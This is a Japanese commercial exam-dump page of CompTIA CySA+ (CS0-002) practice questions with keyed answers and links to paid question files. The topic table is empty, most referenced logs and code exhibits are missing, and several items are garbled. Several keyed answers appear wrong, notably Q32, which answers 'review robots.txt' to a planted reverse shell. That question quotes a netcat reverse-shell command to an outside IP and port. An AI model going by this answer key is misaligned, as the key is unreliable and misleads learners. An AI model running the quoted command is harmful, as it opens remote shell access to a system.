最新のCS0-002試験問題集でCompTIA試験にはトレーニングを提供しています
合格できるCompTIA CompTIA Cybersecurity Analyst (CySA+) Certification ExamのPDF問題集は最近更新された327問あります
CompTIA CS0-002 認定試験の出題範囲:
| トピック | 出題範囲 |
|---|---|
| トピック 1 |
|
| トピック 2 |
|
| トピック 3 |
|
| トピック 4 |
|
| トピック 5 |
|
| トピック 6 |
|
| トピック 7 |
|
質問 19
A security analyst is reviewing the following log from an email security service.
Which of the following BEST describes the reason why the email was blocked?
- A. The From address is invalid.
- B. The email originated from the www.spamfilter.org URL.
- C. The IP address and the remote server name are the same.
- D. The IP address was blacklisted.
- E. The To address is invalid.
正解: D
質問 20
A company has been a victim of multiple volumetric DoS attacks. Packet analysis of the offending traffic shows the following:
Which of the following mitigation techniques is MOST effective against the above attack?
- A. The company should enable the DoS resource starvation protection feature of the gateway NIPS.
- B. The company should implement a network-based sinkhole to drop all traffic coming from
192.168.1.1 at their gateway router. - C. The company should implement the following ACL at their gateway firewall:DENY IP HOST
192.168.1.1 170.43.30.0/24. - D. The company should contact the upstream ISP and ask that RFC1918 traffic be dropped.
正解: D
質問 21
Hotspot Question
A security analyst suspects that a workstation may be beaconing to a command and control server.
You must inspect the logs from the company's web proxy server and the firewall to determine the best course of action to take in order to neutralize the threat with minimum impact to the organization.
Instructions:
If at any time you would like to bring back the initial state of the simulation, please select the Reset button.
When you have completed the simulation, please select the Done button to submit. Once the simulation is submitted, please select the Next button to continue.
正解:
解説:
質問 22
A cybersecurity analyst is currently using Nessus to scan several FTP servers. Upon receiving the results of the scan, the analyst needs to further test to verify that the vulnerability found exists.
The analyst uses the following snippet of code:
Which of the following vulnerabilities is the analyst checking for?
- A. Buffer overflow
- B. SQL injection
- C. Format string attack
- D. Default passwords
正解: B
質問 23
A company's modem response team is handling a threat that was identified on the network Security analysts have as at remote sites. Which of the following is the MOST appropriate next step in the incident response plan?
- A. Enable web server containerization
- B. Deploy virtual firewalls
- C. Quarantine the web server
- D. Capture a forensic image of the memory and disk
正解: B
質問 24
A security analyst is performing a review of Active Directory and discovers two new user accounts in the accounting department. Neither of the users has elevated permissions, but accounts in the group are given access to the company's sensitive financial management application by default.
Which of the following is the BEST course of action?
- A. Monitor the outbound traffic from the application for signs of data exfiltration
- B. Follow the incident response plan for the introduction of new accounts
- C. Disable the user accounts
- D. Confirm the accounts are valid and ensure role-based permissions are appropriate
- E. Remove the accounts' access privileges to the sensitive application
正解: D
質問 25
During a routine network scan, a security administrator discovered an unidentified service running on a new embedded and unmanaged HVAC controller, which is used to monitor the company's datacenter:
The enterprise monitoring service requires SNMP and SNMPTRAP connectivity to operate.
Which of the following should the security administrator implement to harden the system?
- A. Patch and restart the unknown service.
- B. Implement SNMPv3 to secure communication.
- C. Disable the unidentified service on the controller.
- D. Segment and firewall the controller's network.
- E. Disable TCP/UDP ports 161 through 163.
正解: A
質問 26
A security analyst reviews SIEM logs and detects a well-known malicious executable running in a Windows machine The up-to-date antivirus cannot detect the malicious executable Which of the following is the MOST likely cause of this issue?
- A. The antivirus does not have the mltware's signature.
- B. The malware is being executed with administrative privileges.
- C. The malware is fileless and exists only in physical memory.
- D. The malware detects and prevents its own execution in a virtual environment.
正解: C
質問 27
A security analyst is reviewing packet captures from a system that was compromised. The system was already isolated from the network, but it did have network access for a few hours after being compromised. When viewing the capture in a packet analyzer, the analyst sees the following:
Which of the following can the analyst conclude?
- A. Malware is attempting to beacon to 128.50.100.3.
- B. The system is running a DoS attack against ajgidwle.com.
- C. Data is being exfiltrated over DNS.
- D. The system is scanning ajgidwle.com for PII.
正解: C
質問 28
Which of the following are essential components within the rules of engagement for a penetration test? (Select TWO).
- A. Payment terms
- B. Authorization
- C. Schedule
- D. Business justification
- E. List of system administrators
正解: B,C
質問 29
A security analyst is attempting to utilize the blowing threat intelligence for developing detection capabilities:
In which of the following phases is this APT MOST likely to leave discoverable artifacts?
- A. Defensive evasion
- B. Data collection/exfiltration
- C. Lateral movement
- D. Reconnaissance
正解: B
質問 30
A security analyst on the threat-hunting team has developed a list of unneeded, benign services that are currently running as part of the standard OS deployment for workstations. The analyst will provide this list to the operations team to create a policy that will automatically disable the services for all workstations in the organization.
Which of the following BEST describes the security analyst's goal?
- A. To create a system baseline
- B. To improve malware detection
- C. To optimize system performance
- D. To reduce the attack surface
正解: D
質問 31
Understanding attack vectors and integrating intelligence sources are important components of:
- A. a vulnerability management plan.
- B. proactive threat hunting
- C. risk management compliance.
- D. an incident response plan.
正解: C
質問 32
A security analyst is investigating the possible compromise of a production server for the company's public-facing portal. The analyst runs a vulnerability scan against the server and receives the following output:
In some of the portal's startup command files, the following command appears:
nc -o /bin/sh 72.14.1.36 4444
Investigating further, the analyst runs Netstat and obtains the following output
Which of the following is the best step for the analyst to take NEXT?
- A. Recommend training to avoid mistakes in production command files
- B. Delete the unknown files from the production servers
- C. Initiate the security incident response process
- D. Patch a new vulnerability that has been discovered
- E. Manually review the robots .txt file for errors
正解: E
質問 33
After receiving reports latency, a security analyst performs an Nmap scan and observes the following output:
Which of the following suggests the system that produced output was compromised?
- A. MySQL services is identified on a standard PostgreSQL port.
- B. Secure shell is operating of compromise on this system.
- C. Standard HTP is open on the system and should be closed.
- D. There are no indicators of compromise on this system.
正解: D
質問 34
Risk management wants IT to implement a solution that will permit an analyst to intercept, execute, and analyze potentially malicious files that are downloaded from the Internet.
Which of the following would BEST provide this solution?
- A. Risk evaluation
- B. File fingerprinting
- C. Sandboxing
- D. Decomposition of malware
正解: C
質問 35
......
更新されたテストエンジン練習CS0-002問題集と練習試験で使おう:https://jp.fast2test.com/CS0-002-premium-file.html
問題集お試しセットCS0-002テストエンジン問題集トレーニングには327問あります:https://drive.google.com/open?id=1APtVPIhBYhMLmPRfun4PFdlLyG5974J3